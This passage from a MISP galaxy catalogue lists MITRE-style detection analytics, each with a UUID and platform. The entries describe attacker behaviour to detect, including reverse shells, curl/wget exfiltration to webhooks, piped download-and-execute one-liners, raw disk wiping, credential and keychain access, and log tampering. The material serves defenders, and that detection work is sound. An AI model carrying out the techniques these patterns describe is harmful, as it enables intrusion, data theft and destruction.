Process creates a raw/packet socket and attaches a (e)BPF filter (setsockopt SO_ATTACH_FILTER/SO_ATTACH_BPF or bpf(BPF_PROG_LOAD)). Immediately after a matching inbound packet, the same process binds/connects outward to a remote host (reverse shell or beacon).

Internal MISP references

UUID c19f8f89-76f9-4345-8bb6-a065fba50bff which can be used as unique global reference for Analytic 0463 - AN0463 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0463
mitre_platforms ['Linux']

Analytic 0634 - AN0634

Unusual daemons or user processes binding/listening on ports outside of standard ranges, or initiating client connections using mismatched protocol/port pairings.

Internal MISP references

UUID dba32c3a-1ae7-46a4-9b04-d011f37aa801 which can be used as unique global reference for Analytic 0634 - AN0634 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0634
mitre_platforms ['Linux']

Analytic 0437 - AN0437

Processes such as curl, wget, or custom scripts initiating POST requests to webhook endpoints with encoded or bulk data. Defender perspective: abnormal chaining of file compression or access followed by outbound data to webhook URLs.

Internal MISP references

UUID 053dd0c5-9746-46ea-bdeb-b385bf5cbbf8 which can be used as unique global reference for Analytic 0437 - AN0437 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0437
mitre_platforms ['Linux']

Analytic 0473 - AN0473

Adversary installs or modifies email content filters or transport scripts (e.g., Postfix milter, Sendmail milter, Exim filters) using shell access or configuration manipulation.

Internal MISP references

UUID 2c64ece9-c40f-4d1a-babf-106f587454d0 which can be used as unique global reference for Analytic 0473 - AN0473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0473
mitre_platforms ['Linux']

Analytic 0374 - AN0374

User-mode application uses flock() or NSDistributedLock to gain exclusive access to a resource file (e.g., /tmp/guard.lock), conditional logic alters execution if already locked.

Internal MISP references

UUID 4ab12b3f-5c6a-42a6-8d9c-c10b7e814986 which can be used as unique global reference for Analytic 0374 - AN0374 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0374
mitre_platforms ['macOS']

Analytic 0347 - AN0347

Processes use base64, xxd, openssl, python, or Objective-C APIs to encode data (seen in EndpointSecurity exec events or Unified Logs) → quick outbound connections with large bytes_out or HTTP POSTs carrying Base64/MIME bodies.

Internal MISP references

UUID 5eefb166-8f2b-45e0-b5c8-bf71984dec08 which can be used as unique global reference for Analytic 0347 - AN0347 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0347
mitre_platforms ['macOS']

Analytic 0743 - AN0743

Background launch agents/daemons with high CPU use and network access to external mining services.

Internal MISP references

UUID 8cbeecbb-429f-4f30-9f42-266aaa7b2c0f which can be used as unique global reference for Analytic 0743 - AN0743 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0743
mitre_platforms ['macOS']

Analytic 0734 - AN0734

Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.

Internal MISP references

UUID af3dff40-40be-40dd-9a0e-a47cf052880b which can be used as unique global reference for Analytic 0734 - AN0734 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0734
mitre_platforms ['macOS']

Analytic 0834 - AN0834

Sequential behavioral chain of privilege escalation through permission modification: (1) process creation of permission-modifying utilities (icacls, takeown, attrib, cacls), (2) correlation with unusual user context or timing, (3) DACL modification events targeting sensitive files/directories, (4) subsequent file access or modification attempts indicating successful privilege bypass.

Internal MISP references

UUID 0669b8b5-8888-45aa-acf8-819dfb7d00a2 which can be used as unique global reference for Analytic 0834 - AN0834 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0834
mitre_platforms ['Windows']

Analytic 0348 - AN0348

ESXi shell (BusyBox) or VMware utilities (openssl, python if present) used to Base64/hex encode data from datastore or config files → followed by abnormal egress from the host (NSX/flow logs) with asymmetric bytes_out or HTTPS posts to non-management endpoints.

Internal MISP references

UUID 1b53dd1b-c98e-4b25-a7fd-70dad586ebf1 which can be used as unique global reference for Analytic 0348 - AN0348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0348
mitre_platforms ['ESXi']

Analytic 0384 - AN0384

Unusual direct disk access attempts (e.g., use of \\.\PhysicalDrive notation), abnormal writes to MBR/boot sectors, and installation of kernel drivers that grant raw disk access. Correlate anomalous process creation with disk modification attempts and driver loads.

Internal MISP references

UUID 5dc85538-115c-4c56-878a-39caaba91e74 which can be used as unique global reference for Analytic 0384 - AN0384 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0384
mitre_platforms ['Windows']

Analytic 0843 - AN0843

A source performs a short closed-port sequence; the host then modifies iptables/nftables/ufw rules or starts a daemon binding a new socket, followed by a successful connection from the same source.

Internal MISP references

UUID 7bf8954f-5028-419d-b93f-9c6bfe6e5086 which can be used as unique global reference for Analytic 0843 - AN0843 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0843
mitre_platforms ['Linux']

Analytic 0483 - AN0483

Forged cookies in IaaS environments may appear as authentication attempts that bypass MFA, leveraging AssumeRole or session APIs with cookies that were never legitimately issued. Defenders should correlate cloud logs for cookie-based sessions without prior valid authentication, often followed by resource access from unfamiliar IP addresses.

Internal MISP references

UUID 9a6089cc-92a7-48ea-b4a4-4d4d2b6489e3 which can be used as unique global reference for Analytic 0483 - AN0483 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0483
mitre_platforms ['IaaS']

Analytic 0438 - AN0438

Unexpected apps or scripts (osascript, curl, Automator workflows) exfiltrating data via webhooks. Defender perspective: correlation of clipboard/file read operations followed by HTTPS POST traffic to webhook services.

Internal MISP references

UUID d7f9b07f-401c-4685-a014-6a824f95f866 which can be used as unique global reference for Analytic 0438 - AN0438 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0438
mitre_platforms ['macOS']

Analytic 0934 - AN0934

Shell utilities or scripts deleting /etc/systemd/system/rescue.target, /etc/fstab backups, or /boot/efi partitions; chattr used to block snapshot auto-recovery.

Internal MISP references

UUID 135452f6-c760-42a6-8a3f-d09c33f05369 which can be used as unique global reference for Analytic 0934 - AN0934 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0934
mitre_platforms ['Linux']

Analytic 0394 - AN0394

Detects removal of adversary artifacts via rm, unlink, or secure tools, with focus on shell sessions, temp files, and modified LaunchAgents or system directories.

Internal MISP references

UUID 175bf607-fca6-4555-a30b-3d6cd4cfe876 which can be used as unique global reference for Analytic 0394 - AN0394 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0394
mitre_platforms ['macOS']

Analytic 0493 - AN0493

Detects adversary exploitation of authentication mechanisms or credential validation processes. Defender perspective includes forged Kerberos tickets (e.g., MS14-068), abnormal LSASS memory access, replayed authentication attempts, and unexpected crashes of authentication services. Multi-event correlation ties exploitation attempts to abnormal process creation, service instability, and suspicious authentication events.

Internal MISP references

UUID 2d4a40e4-359f-49ac-9e3f-58e29497aa41 which can be used as unique global reference for Analytic 0493 - AN0493 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0493
mitre_platforms ['Windows']

Analytic 0439 - AN0439

VMware services or management daemons generating HTTP POST requests to webhook endpoints, chained with unusual datastore or log access. Defender perspective: exfiltration from VM logs or disk images over webhook URLs.

Internal MISP references

UUID 37166782-8770-4812-b70c-27f3c705489b which can be used as unique global reference for Analytic 0439 - AN0439 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0439
mitre_platforms ['ESXi']

Analytic 0349 - AN0349

Unusual modification or creation of loginwindow-related plist files in '~/Library/Preferences/ByHost' correlated with unauthorized application paths and execution upon login.

Internal MISP references

UUID 67d1900f-9e02-4290-a14c-6d32be508d19 which can be used as unique global reference for Analytic 0349 - AN0349 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0349
mitre_platforms ['macOS']

Analytic 0943 - AN0943

Detects creation of scheduled tasks via at.exe or WMI Win32_ScheduledJob class, followed by execution of anomalous processes by svchost.exe or taskeng.exe.

Internal MISP references

UUID b9f79a81-9fee-47f2-bef8-a9f64fde935e which can be used as unique global reference for Analytic 0943 - AN0943 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0943
mitre_platforms ['Windows']

Analytic 0553 - AN0553

Rule manipulation through local email clients (e.g., Evolution, Thunderbird) or server-side filtering scripts (e.g., sieve) creating conditions to move or discard emails with security-related keywords.

Internal MISP references

UUID 487d9ddf-a790-4adc-9be4-ec5651e790f1 which can be used as unique global reference for Analytic 0553 - AN0553 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0553
mitre_platforms ['Linux']

Analytic 0535 - AN0535

Detection of attempts to disable or tamper with Windows Event Logging. This includes stopping or disabling the EventLog service, modifying registry keys related to EventLog and Autologger, using auditpol or wevtutil to disable categories or clear audit policies, and detecting suspicious gaps or resets in event logs. Defenders observe registry changes, service state changes, process execution of disabling commands, and anomalies in event record sequences.

Internal MISP references

UUID 705168ad-1701-453c-9aea-c75029492b89 which can be used as unique global reference for Analytic 0535 - AN0535 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0535
mitre_platforms ['Windows']

Analytic 0355 - AN0355

Adversary renames LOLBINs or deploys binaries with spoofed file names, internal PE metadata, or misleading icons to appear legitimate. File creation is followed by execution or service registration inconsistent with known usage.

Internal MISP references

UUID e3d982ec-2729-4e98-b340-affa13096fd6 which can be used as unique global reference for Analytic 0355 - AN0355 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0355
mitre_platforms ['Windows']

Analytic 0356 - AN0356

Adversary drops renamed binaries in uncommon directories (e.g., /tmp, /dev/shm) or uses special characters in names (e.g., trailing space, Unicode RLO). Execution or cronjob registration follows shortly after file drop.

Internal MISP references

UUID 3191336e-8cdb-4d41-80a4-aa2ab869f7bf which can be used as unique global reference for Analytic 0356 - AN0356 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0356
mitre_platforms ['Linux']

Analytic 0635 - AN0635

Applications making outbound connections on non-standard ports or launchd services bound to ports inconsistent with system baselines.

Internal MISP references

UUID 785c44d0-7e5b-4d3e-a3cd-0c5e96b8891b which can be used as unique global reference for Analytic 0635 - AN0635 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0635
mitre_platforms ['macOS']

Analytic 0536 - AN0536

Drive enumeration using PowerShell (Get-PSDrive), wmic logicaldisk, or Win32 API indicative of local volume enumeration by non-admin users or executed outside of baseline system inventory scripts.

Internal MISP references

UUID 9ffd3332-fcc0-440d-b717-ef98e140c543 which can be used as unique global reference for Analytic 0536 - AN0536 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0536
mitre_platforms ['Windows']

Analytic 0563 - AN0563

CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console.

Internal MISP references

UUID e7debe02-4326-48ae-aa22-59c2a847d3e7 which can be used as unique global reference for Analytic 0563 - AN0563 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0563
mitre_platforms ['Network Devices']

Analytic 0653 - AN0653

Abnormal usage of Preview, ImageMagick, or binary editors to alter images/documents, followed by exfiltration or outbound connections with mismatched file MIME types or payload structure.

Internal MISP references

UUID eb6edb6d-9684-4ef7-96b2-13c087276d80 which can be used as unique global reference for Analytic 0653 - AN0653 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0653
mitre_platforms ['macOS']

Analytic 0365 - AN0365

Domain group and user enumeration via dscl or dscacheutil, or queries to directory services from non-admin endpoints.

Internal MISP references

UUID ef50b854-172a-457b-9d0e-c95d9835eaaa which can be used as unique global reference for Analytic 0365 - AN0365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0365
mitre_platforms ['macOS']

Analytic 0537 - AN0537

Abnormal use of lsblk, fdisk -l, lshw -class disk, or parted by non-admin users or within non-interactive shells suggests suspicious disk enumeration activity.

Internal MISP references

UUID 1a7052d7-84f1-4116-bdb1-49bbe8709e3d which can be used as unique global reference for Analytic 0537 - AN0537 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0537
mitre_platforms ['Linux']

Analytic 0735 - AN0735

Detects Node.js or JavaScript interpreter execution from web shells, cron jobs, or local users. Correlates execution with reverse shell behavior, file modifications, or abnormal outbound connections.

Internal MISP references

UUID 26520d1c-1e0a-443b-817e-7ec1846a0476 which can be used as unique global reference for Analytic 0735 - AN0735 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0735
mitre_platforms ['Linux']

Analytic 0573 - AN0573

Detects attempts to enumerate VMs via hypervisor tools like virsh, VBoxManage, or qemu-img. Defender correlates suspicious command invocations with parent process lineage and unexpected users.

Internal MISP references

UUID 753ec5a6-9327-452e-ab9c-62b7206c24aa which can be used as unique global reference for Analytic 0573 - AN0573 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0573
mitre_platforms ['Linux']

Analytic 0357 - AN0357

Adversary creates disguised launch daemons or apps with misleading names and bundle metadata (e.g., Info.plist values inconsistent with binary path or icon). Launch is correlated with user logon or persistence setup.

Internal MISP references

UUID 7ebea786-db9c-439d-9caf-d0dd740047f3 which can be used as unique global reference for Analytic 0357 - AN0357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0357
mitre_platforms ['macOS']

Analytic 0753 - AN0753

Use of cloud-based bastion or VM console session followed by commands that initiate outbound SSH or RDP sessions from the cloud instance to other environments.

Internal MISP references

UUID dfabf07a-8179-43f5-abf6-699202c10343 which can be used as unique global reference for Analytic 0753 - AN0753 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0753
mitre_platforms ['IaaS']

Analytic 0375 - AN0375

Detection of the creation of VSCode or JetBrains CLI tunneling profiles followed by persistent remote access via IDE-integrated tunnels, potentially authenticated via GitHub or JetBrains accounts.

Internal MISP references

UUID e3517ec0-f12a-4f64-8d10-e6bc2677f7d7 which can be used as unique global reference for Analytic 0375 - AN0375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0375
mitre_platforms ['Windows']

Analytic 0358 - AN0358

Adversary uses renamed container images, injects files into containers with misleading names or metadata (e.g., renamed system binaries), and executes them during startup or scheduled jobs.

Internal MISP references

UUID 6927a2ad-c56f-4e87-9392-6e3eef07e57e which can be used as unique global reference for Analytic 0358 - AN0358 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0358
mitre_platforms ['Containers']

Analytic 0538 - AN0538

Disk enumeration via diskutil list or system_profiler SPStorageDataType run outside of user login or not associated with system inventory tools.

Internal MISP references

UUID a98fc9c5-9c4c-47c5-a773-d68b523c7304 which can be used as unique global reference for Analytic 0538 - AN0538 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0538
mitre_platforms ['macOS']

Analytic 0583 - AN0583

Registry modification of the LSA Authentication Packages key followed by LSASS loading a non-standard or unsigned DLL. This includes unusual write access to HKLM\SYSTEM\CurrentControlSet\Control\Lsa, especially during non-installation timeframes. Correlated with lsass.exe loading DLLs not present in baseline or lacking valid signatures.

Internal MISP references

UUID d415367c-3624-4a68-a2b7-4734662db190 which can be used as unique global reference for Analytic 0583 - AN0583 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0583
mitre_platforms ['Windows']

Analytic 0385 - AN0385

Processes invoking destructive commands (dd, shred, wipe) with raw device targets (e.g., /dev/sda, /dev/nvme0n1). Detect direct writes to disk partitions and abnormal superblock or bootloader modifications. Correlate shell execution with subsequent block device I/O.

Internal MISP references

UUID d442d480-cfb9-43cc-b959-2f81513b432d which can be used as unique global reference for Analytic 0385 - AN0385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0385
mitre_platforms ['Linux']

Analytic 0835 - AN0835

Behavioral sequence of unauthorized privilege escalation via permission modification: (1) chmod/chown/setfacl process execution with suspicious parameters, (2) Targeting of critical system files or unusual permission values, (3) Correlation with non-privileged user context or unusual timing patterns, (4) Follow-on file access indicating successful permission bypass

Internal MISP references

UUID e268a6cb-2264-473e-9683-fb0f33ecd793 which can be used as unique global reference for Analytic 0835 - AN0835 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0835
mitre_platforms ['Linux']

Analytic 0853 - AN0853

Cloud workload exploitation leads to repeated container, service, or VM termination/restart, typically associated with CVE-based crash triggers or fuzzed payloads.

Internal MISP references

UUID f1aae71a-6460-4c08-9aa7-49743f766a71 which can be used as unique global reference for Analytic 0853 - AN0853 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0853
mitre_platforms ['IaaS']

Analytic 0395 - AN0395

Detects manual or scripted removal of logs, artifacts, or malware droppings via rm or PowerCLI in ESXi shell. Focus on deletions from /tmp/, /var/core/, or /scratch.

Internal MISP references

UUID 3f53ca22-5efe-43b3-8225-5fdd4b8a8194 which can be used as unique global reference for Analytic 0395 - AN0395 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0395
mitre_platforms ['ESXi']

Analytic 0539 - AN0539

Use of esxcli storage or vim-cmd vmsvc/getallvms by unusual sessions or through interactive shells unrelated to administrative maintenance tasks.

Internal MISP references

UUID 478e6298-d012-4337-b2ed-0f8d4909ee05 which can be used as unique global reference for Analytic 0539 - AN0539 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0539
mitre_platforms ['ESXi']

Analytic 0953 - AN0953

Defenders can detect suspicious reversion of cloud compute instances by monitoring for unusual snapshot restores, rollback actions, or ephemeral storage resets that occur outside expected administrative workflows. From a defender’s perspective, relevant detection chains include: a snapshot restore triggered by a new or rarely used account, a sequence of snapshot creation immediately followed by a restore and instance start, or rollbacks performed from anomalous geographic or network locations. These patterns may indicate attempts to remove forensic evidence or re-establish a clean execution state for persistence.

Internal MISP references

UUID 4eaeffc2-bdfa-427c-a009-daadee39457d which can be used as unique global reference for Analytic 0953 - AN0953 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0953
mitre_platforms ['IaaS']

Analytic 0935 - AN0935

ESXi shell or vim-cmd execution that deletes all VM snapshots using vmsvc/snapshot.removeall or rm on snapshot paths.

Internal MISP references

UUID e2fb4be5-bd70-45d6-89ad-e687bc475285 which can be used as unique global reference for Analytic 0935 - AN0935 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0935
mitre_platforms ['ESXi']

Analytic 0359 - AN0359

Adversary places scripts or binaries with misleading names in /etc/rc.local.d or /var/spool/cron, or registers services with legitimate-sounding names not present in default ESXi builds.

Internal MISP references

UUID f3dfb562-94ef-44ea-be4f-17ac2d0771b5 which can be used as unique global reference for Analytic 0359 - AN0359 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0359
mitre_platforms ['ESXi']

Analytic 0593 - AN0593

Login to vSphere or ESXi hosts using domain accounts, especially those associated with vpxuser or unexpected group memberships.

Internal MISP references

UUID f931e587-28f8-4923-b054-98d6348dcafe which can be used as unique global reference for Analytic 0593 - AN0593 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0593
mitre_platforms ['ESXi']

Analytic 0636 - AN0636

VM services or management daemons communicating on ports not defined by VMware defaults, such as vpxa or hostd processes initiating traffic over high-numbered or unexpected ports.

Internal MISP references

UUID 4e3afe58-e384-4b9e-9137-adaa0bac72af which can be used as unique global reference for Analytic 0636 - AN0636 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0636
mitre_platforms ['ESXi']

Analytic 0663 - AN0663

Adversary gains shell access or uploads a malicious script to deface hosted web content in Nginx, Apache, or other services.

Internal MISP references

UUID 7b95ffd7-165d-4435-97b6-4508b9328d89 which can be used as unique global reference for Analytic 0663 - AN0663 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0663
mitre_platforms ['Linux']

Analytic 0366 - AN0366

Detection of suspicious access to cloud-native secret management systems (AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, HashiCorp Vault). Focuses on abnormal secret retrieval activity, such as secrets being accessed by unusual identities, from unexpected regions, outside business hours, or at high volume. Correlates API calls to secret retrieval with surrounding authentication events, role assumptions, and anomalous execution patterns.

Internal MISP references

UUID 90eca5d7-c330-4b86-bde6-de04019cbba7 which can be used as unique global reference for Analytic 0366 - AN0366 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0366
mitre_platforms ['IaaS']

Analytic 0736 - AN0736

Abuse of launchctl to execute or manage Launch Agents and Daemons. Defender perspective: correlation of suspicious plist file creation or modification in LaunchAgents/LaunchDaemons directories with subsequent execution of the launchctl command. Abnormal executable paths (e.g., /tmp, /Shared) or launchctl activity followed by network connections are highly suspicious.

Internal MISP references

UUID 0297fd45-97bc-4913-8d38-218eae431544 which can be used as unique global reference for Analytic 0736 - AN0736 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0736
mitre_platforms ['macOS']

Analytic 0367 - AN0367

Detects unusual outbound file transfer behavior using protocols like FTP, SMB, SMTP, or DNS, involving non-standard processes, off-hour activity, or uncommonly high volume.

Internal MISP references

UUID 1543bc4a-7614-417a-85b9-d67e3da0350c which can be used as unique global reference for Analytic 0367 - AN0367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0367
mitre_platforms ['Windows']

Analytic 0763 - AN0763

Unusual TLS tunnels through ports not normally encrypted (e.g., TLS on port 8080, 53). Defender sees NetFlow/IPFIX or packet inspection indicating high-entropy traffic volumes and asymmetric client/server exchange ratios.

Internal MISP references

UUID 29a00bef-79bd-4eb9-bf92-01651cffe9b0 which can be used as unique global reference for Analytic 0763 - AN0763 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0763
mitre_platforms ['Network Devices']

Analytic 0673 - AN0673

Monitor for security commands and API calls interacting with the Keychain, as well as file access attempts to stored certificates and private keys in ~/Library/Keychains or /Library/Keychains.

Internal MISP references

UUID 62285936-d8a3-4b18-b3b4-a521fbef10ec which can be used as unique global reference for Analytic 0673 - AN0673 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0673
mitre_platforms ['macOS']

Analytic 0376 - AN0376

Creation of VSCode tunnel configuration file combined with interactive remote session via code CLI or ssh with JetBrains gateway.

Internal MISP references

UUID a0a0f8e9-7a55-4450-8569-7a0e1c0aac0b which can be used as unique global reference for Analytic 0376 - AN0376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0376
mitre_platforms ['Linux']

Analytic 0637 - AN0637

Initial process initiates outbound connection to first-stage C2, receives payloads or commands, then spawns or injects into a second process that establishes a new outbound connection to an unrelated destination (second-stage C2).

Internal MISP references

UUID f13ff1ad-5c7b-4136-b5cb-7a5663c3c54f which can be used as unique global reference for Analytic 0637 - AN0637 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0637
mitre_platforms ['Windows']

Analytic 0386 - AN0386

Abnormal invocation of diskutil, asr, or low-level APIs (IOKit) to erase/partition drives. Correlate process execution with unified log entries showing destructive disk operations.

Internal MISP references

UUID 2016853a-07eb-4df4-a471-69b55f82b34d which can be used as unique global reference for Analytic 0386 - AN0386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0386
mitre_platforms ['macOS']

Analytic 0368 - AN0368

Detects file exfiltration using tools like curl, scp, or custom binaries over protocols such as FTP, HTTP/S, or DNS tunneling, especially outside baseline user behavior.

Internal MISP references

UUID 7402eb3b-9349-478a-a8e9-7ee72c4b67c5 which can be used as unique global reference for Analytic 0368 - AN0368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0368
mitre_platforms ['Linux']

Analytic 0863 - AN0863

A compromised package/update (deb/rpm/tarball/AppImage/vendor updater) is installed, writing/overwriting files in /usr/local/bin, /usr/bin, /opt, or ~/.local; first run executes unexpected shells/curl/wget and connects to unapproved hosts. Correlate package/updater execution → file writes/replace → first-run child processes → egress.

Internal MISP references

UUID b6f88f17-e80f-4c75-99a5-f752880196aa which can be used as unique global reference for Analytic 0863 - AN0863 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0863
mitre_platforms ['Linux']

Analytic 0683 - AN0683

Monitor call log records from corporate devices for unusual or unauthorized numbers, especially repeated calls to/from known malicious phone numbers. Correlate with subsequent system events (e.g., browser navigation, remote management tool execution).

Internal MISP references

UUID caa11058-4906-48b4-ab3f-a650aab6968d which can be used as unique global reference for Analytic 0683 - AN0683 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0683
mitre_platforms ['Windows']

Analytic 0836 - AN0836

macOS-specific permission modification behavioral chain: (1) chmod/chown/chflags process execution, (2) System Integrity Protection (SIP) bypass attempts, (3) Extended attribute (xattr) modifications, (4) Unified log correlation with file system events, (5) Subsequent access to previously restricted resources

Internal MISP references

UUID e564e2b8-542b-4003-a8b7-df9d3396f5b9 which can be used as unique global reference for Analytic 0836 - AN0836 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0836
mitre_platforms ['macOS']

Analytic 0638 - AN0638

Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.

Internal MISP references

UUID e5fcc815-0ab4-4da9-aade-659b87d079da which can be used as unique global reference for Analytic 0638 - AN0638 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0638
mitre_platforms ['Linux']

Analytic 0396 - AN0396

Process creation involving suspicious delays (e.g., Sleep, ping -n loops, WaitForSingleObject), followed by sensitive system access or lateral movement behaviors.

Internal MISP references

UUID 10c89810-d298-42d6-80dd-1228e737e33f which can be used as unique global reference for Analytic 0396 - AN0396 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0396
mitre_platforms ['Windows']

Analytic 0963 - AN0963

User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.

Internal MISP references

UUID 1895e723-dcfb-45d4-80fc-aaa0c3963cc9 which can be used as unique global reference for Analytic 0963 - AN0963 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0963
mitre_platforms ['Linux']

Analytic 0639 - AN0639

Initial process using NSURLSession or similar APIs reaches out to known staging domains, followed by creation of a reverse shell or RAT connecting to a second unrelated server.

Internal MISP references

UUID 53ba6028-13cd-449e-aab4-d2f9fea458a4 which can be used as unique global reference for Analytic 0639 - AN0639 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0639
mitre_platforms ['macOS']

Analytic 0936 - AN0936

Execution of erase, format, and reload in immediate sequence from a privileged AAA session.

Internal MISP references

UUID 55a0743e-cdc1-44d1-94c7-cf3837e3ef2f which can be used as unique global reference for Analytic 0936 - AN0936 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0936
mitre_platforms ['Network Devices']

Analytic 0693 - AN0693

Remote/API driven creation and start of a container whose image is not on an allow-list (or is tagged latest), executed by a non-admin principal, and/or started with risky runtime attributes (e.g., --privileged, host PID/NET namespaces, sensitive host path mounts, capability adds). Correlates create → start ➜ first network/process actions from that container within a short time window.

Internal MISP references

UUID c345908d-4f74-4341-a203-8c76be2a136b which can be used as unique global reference for Analytic 0693 - AN0693 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0693
mitre_platforms ['Containers']

Analytic 0369 - AN0369

Detects non-native file transfer via curl, Python scripts, or AppleScript using uncommon protocols like FTP, SMTP, or DNS exfiltration through mDNSResponder abuse.

Internal MISP references

UUID c545f39e-d1a2-4b0e-bdf1-6a84226557e9 which can be used as unique global reference for Analytic 0369 - AN0369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0369
mitre_platforms ['macOS']

Analytic 0377 - AN0377

Detection of JetBrains or VSCode tunnel profile creation followed by unusual persistent SSH or IDE-based tunnel communications to devtunnel APIs.

Internal MISP references

UUID 1a93a610-7389-4ea7-a053-e99d35a5477a which can be used as unique global reference for Analytic 0377 - AN0377 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0377
mitre_platforms ['macOS']

Analytic 0773 - AN0773

Detection of new admin or role assignment actions within Microsoft 365/O365 environments to elevate access for persistence or lateral movement.

Internal MISP references

UUID 8601dbfa-8767-4328-8809-1930b53b5e31 which can be used as unique global reference for Analytic 0773 - AN0773 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0773
mitre_platforms ['Office Suite']

Analytic 0737 - AN0737

Detects mailbox manipulation or deletion via PowerShell (e.g., Remove-MailboxExportRequest), file deletion from Outlook data stores (Unistore.db), or tampering with quarantined mail logs.

Internal MISP references

